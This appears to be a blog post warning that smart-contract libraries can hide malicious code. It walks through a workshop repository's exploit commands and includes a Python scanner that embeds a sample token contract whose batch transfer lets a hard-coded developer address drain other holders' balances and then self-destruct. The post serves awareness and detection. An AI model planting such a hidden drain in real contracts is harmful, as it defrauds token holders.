Picture credit: https://www.pilotonline.com/life/wildlife-nature/article_71a38963-3f05-574d-9b24-f0df6590ef75.html

Why we should be aware of the hiding malicious code in smart contracts

sirawt
Published in BLOCK6
4 min read · Mar 20, 2022


How attackers hide malicious code in smart contracts, and how they use it to exploit users

What is malicious code?

Malicious code is unwanted files or programs that can cause harm to a computer or compromise data stored on a computer. Various classifications of malicious code include viruses, worms, and Trojan horses.

  • Viruses have the ability to damage or destroy files on a computer system and are spread by sharing already infected removable media, opening malicious email attachments, and visiting malicious web pages.
  • Worms are a type of virus that self-propagates from computer to computer. Its functionality is to use all of your computer’s resources, which can cause your computer to stop responding.
  • Trojan Horses are computer programs that hide a virus or a potentially damaging program. It is not uncommon for free software to contain a Trojan horse, making a user think they are using legitimate software while the program is performing malicious actions on the computer.
  • Malicious data files are non-executable files — such as a Microsoft Word document, an Adobe PDF, a ZIP file, or an image file — that exploit weaknesses in the software program used to open it. Attackers frequently use malicious data files to install malware on a victim’s system, commonly distributing the files via email, social media, and websites.

credit: CISA

Malicious code can also appear in smart contracts. There are multiple ways to hide unusual behavior from the people on the blockchain network. In this article, we show one of the common methods: injecting or modifying code in third-party contract libraries.

Can you spot anything unusual in the code below?

The contract code above looks fairly fine, doesn’t it? Line 20 of the Crowdsale contract approves only the accepted token for the Crowdsale, which is a bit odd, but if you move on to the MyToken contract, everything there looks perfectly usual, with nothing wrong. It is clean and intelligible. Yet malicious code can still be hidden inside the third-party contract libraries. Let’s go to the workshop and see how that is possible.

Workshop Walkthrough

# clone the repository
git clone https://github.com/MASDXI/malicious-crowdsale-contract.git
# install dependencies
yarn install
# compile the contracts
yarn compile
# run the contract tests
yarn test

To run the exploit in sequence, first start a local development network (a local test net) for the script to run against.

# start the local test net
yarn rpc
# run the exploit steps in sequence
yarn exploit

How is this possible? The code looks fine! Here is what I did not tell you before: the MyToken contract is an ERC20 token extended with a batch transfer function, and that batch transfer is not an ordinary one. It contains a rug-pull condition that triggers when it is called by the malicious developer’s address; moreover, the malicious developer can make the drain pseudo-anonymous by distributing the funds to any addresses they want, as you will see in the code below. After transferring the funds away, they can also trigger self-destruct of the MyToken contract. To learn more about self-destruct, see https://docs.soliditylang.org/en/v0.8.13/introduction-to-smart-contracts.html#deactivate-and-self-destruct

Modified contract library
interaction flow

In this example, the crowdsale smart contract has had malicious code injected into one of its library contracts. If MyToken were selling ERC721 or ERC1155 NFTs instead of ERC20 tokens, it would be just as painful for the investors and venture capital firms involved.
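As an added illustration (my own triage script, not code from the workshop repository), the check below scans Solidity source text for the three red flags this case turns on: a selfdestruct, a hard-coded address, and a transfer-style function that moves some other holder’s balance without spending an allowance. The two contract fragments are constructed for the example; the developer address in them is a placeholder.

```python
import re

# Constructed Solidity fragments (not the workshop repository's code). The first one has the
# pattern described above: a batch transfer with a hidden branch that moves other holders'
# balances when a hard-coded developer address calls it, plus a selfdestruct.
SUSPICIOUS_SRC = """
contract MyToken is ERC20 {
    address private constant DEV = 0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef;
    function batchTransfer(address[] memory from, address[] memory to, uint256[] memory amt) public {
        for (uint256 i = 0; i < to.length; i++) {
            if (msg.sender == DEV) { _transfer(from[i], to[i], amt[i]); }
            else { _transfer(msg.sender, to[i], amt[i]); }
        }
    }
    function close() public { selfdestruct(payable(DEV)); }
}
"""
# A batch transfer that only spends the caller's own balance, and a transferFrom that
# charges allowance first: nothing in here should be flagged.
CLEAN_SRC = """
contract GoodToken is ERC20 {
    function batchTransfer(address[] memory to, uint256[] memory amt) public {
        for (uint256 i = 0; i < to.length; i++) { _transfer(msg.sender, to[i], amt[i]); }
    }
    function transferFrom(address from, address to, uint256 amt) public returns (bool) {
        _spendAllowance(from, msg.sender, amt); _transfer(from, to, amt); return true;
    }
}
"""

def function_bodies(src):
    """Split source at each 'function' keyword (text triage, not a real Solidity parser)."""
    heads = list(re.finditer(r"\bfunction\s+(\w+)\s*\(", src))
    return [(m.group(1), src[m.start():heads[i + 1].start() if i + 1 < len(heads) else len(src)])
            for i, m in enumerate(heads)]

def scan(src):
    """Return (kind, detail) findings a reviewer should read before trusting a library."""
    findings = []
    if re.search(r"\bselfdestruct\s*\(", src):
        findings.append(("selfdestruct", "contract can be deactivated after funds are moved"))
    for addr in sorted(set(re.findall(r"0x[0-9a-fA-F]{40}", src))):
        findings.append(("hardcoded-address", addr))
    for name, body in function_bodies(src):
        # _transfer() whose holder is not msg.sender is only legitimate after an allowance check
        for m in re.finditer(r"\b_transfer\(\s*([^,]+),", body):
            holder = m.group(1).strip()
            if holder != "msg.sender" and "_spendAllowance(" not in body:
                findings.append(("moves-other-holders-funds", f"{name}: _transfer({holder}, ...)"))
    return findings
```

A finding is a reason to read the function by hand, not proof of malice; the point is that every imported library gets the same scrutiny as the main contract.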

Conclusion

  • Trusted library contracts can be modified or overwritten by malicious developers. You must verify that the libraries a contract imports DO NOT include anything unusual.
  • Malicious developers can manipulate smart contracts that include such hidden code.
  • Avoid interacting with unverified smart contracts, or at least be aware of the risk when you do.

Contents distributed by Learn.Block6.tech
